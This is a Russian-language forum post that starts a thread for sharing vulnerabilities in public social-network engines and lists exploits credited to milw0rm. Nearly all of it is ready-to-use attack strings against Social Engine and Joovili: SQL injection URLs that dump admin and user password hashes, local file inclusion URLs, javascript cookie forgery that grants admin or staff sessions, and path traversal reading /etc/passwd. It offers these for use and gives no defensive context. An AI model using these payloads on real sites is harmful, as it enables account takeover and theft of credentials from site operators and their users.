Предлагаю в этой теме выкладывать уязвимости в паблик движках для Социальных сетей. Вот парочка от меня: Social Engine Social Engine (browse_classifieds.php s) SQL Injection Vulnerability Exploit: Code: http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities Code: Exploit: http://[site]/admin/admin_header_album.php?global_lang=[LFI]%00 Exploit: http://[site]/admin/admin_header_blog.php?global_lang=[LFI]%00 Exploit: http://[site]/admin/admin_header_group.php?global_lang=[LFI]%00 Exploit: http://[site]/header_album.php?global_lang=[LFI]%00 Exploit: http://[site]/header_blog.php?global_lang=[LFI]%00 Exploit: http://[site]/header_group.php?global_lang=[LFI]%00 Joovili Joovili 3.1.4 Insecure Cookie Handling Vulnerability Code: demo admin login: http://demo.joovili.com/admin demo user login: http://demo.joovili.com/ demo staff login: http://demo.joovili.com/staff/ exploit for user: javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; for demo user: javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/"; for demo admin: javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/"; for demo staff: javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/" Joovili <= 3.0 Multiple SQL Injection Vulnerabilities Code: http://localhost/[installdir]/search.php Search Music: Exploit 1: '+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8+from+joovili_users/* Exploit 2: '+union+select+1,2,3,concat_ws(0x3a,admin_username,admin_password),5,6,7,8+from+joovili_admins/* Exploit 1: http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users/* Exploit 2: http://localhost/[installdir]/view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins/* Exploit 1: http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users/* Exploit 2: http://localhost/[installdir]/view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins/* http://localhost/[installdir]/view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9/* http://localhost/[installdir]/view.music.php?id='+union+select+1,2,3,version(),5,6,7,8/* http://localhost/[installdir]/view.picture.php?id='+union+select+1,user(),3,4,5,6,7/* http://localhost/[installdir]/view.video.php?id='+union+select+1,2,3,user(),5,6,7,8/* Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability Code: [<>] Explo!t : [<>] 1 ====>http:hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,admin_username,admin_password),5,user(),7,8,9/**/from/**/joovili_admins/* [<>] 2 =====>http://hacker_egy/browse.videos.php?category=-1/**/union/**/select/**/1,2,3,concat_ws(0x3a3a,id,username,password,email),5,user(),7,8,9/**/from/**/joovili_users/* Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability Code: version: 2.*** include/images.inc.php?picture=../../../../../../../../etc/passwd&thumbnail=FALSE include/images.inc.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE version 3.** joovili.images.php?picture=../../../../../../../..///etc/passwd&thumbnail=FALSE joovili.images.php?picture=../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd&thumbnail=FALSE (с) milw0rm.com
